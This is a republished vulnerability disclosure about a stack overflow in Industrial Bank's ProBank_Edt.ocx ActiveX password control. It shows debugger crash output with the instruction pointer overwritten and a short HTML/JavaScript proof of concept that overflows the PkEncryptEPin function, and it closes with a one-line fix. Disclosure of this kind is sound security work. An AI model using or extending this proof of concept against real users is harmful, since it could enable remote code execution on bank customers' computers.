Home > Cloud Computing > Cloud Security

A software application in Industrial Bank can directly execute code remotely.

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

A software application in Industrial Bank can directly execute code remotely.

The PkEncryptEPin function of the ProBank_Edt.ocx control of the Industrial Bank has stack overflow.


This will cause stack overflow, and the EIP will be controlled, directly 0x41414141

Password control download link https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe


Crashinfo:


ModLoad: 03750000 03764000 C:\PROGRA~1\PROBAN~1\PROBAN~1.OCXModLoad: 73d30000 73e2e000   C:\WINDOWS\system32\MFC42.DLLModLoad: 61be0000 61bed000   C:\WINDOWS\system32\MFC42LOC.DLL(e10.1ec): Break instruction exception - code 80000003 (first chance)eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005eip=7c92120e esp=036cffcc ebp=036cfff4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - ntdll!DbgBreakPoint:7c92120e cc              int     3Missing image name, possible paged-out or corrupt data.0:016> g(e10.f14): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00004000 ebx=77c0f931 ecx=00000875 edx=020dd8dc esi=03878e40 edi=020e0000eip=03755197 esp=020dd8b8 ebp=0387b030 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX - PROBAN_1!DllUnregisterServer+0x3127:03755197 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]0:008> g(e10.f14): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000eip=41414141 esp=020dd4e8 ebp=020dd508 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246<Unloaded_pi.dll>+0x41414140:41414141 ??              ???

 


Vulnerability poc:

<object id='obj' classid='CLSID:{8BE81FD3-B85E-CD48-1179-1B592DDE9815}'></object><script>argv1="A"argv2="A"while(argv2.length<16384)argv2+=argv2ret = obj.PkEncryptEPin(argv1,argv2)</script>



Demo process

Install controls
 




 




Build a Web Service terminal and directly activate poc.html


 




The figure above shows the wingdbg crash information.

 




We can see that the eip is directly controlled 0x41414141, that is, the ascii value of the second parameter "".
 

Solution:

Strictly verify the input parameters

 

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
can spyware installed remotely can quickbooks accessed remotely can spyware installed remotely can phone hacked remotely directly opposite in character how to execute php code in browser can write php code in javascript
Related Article
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More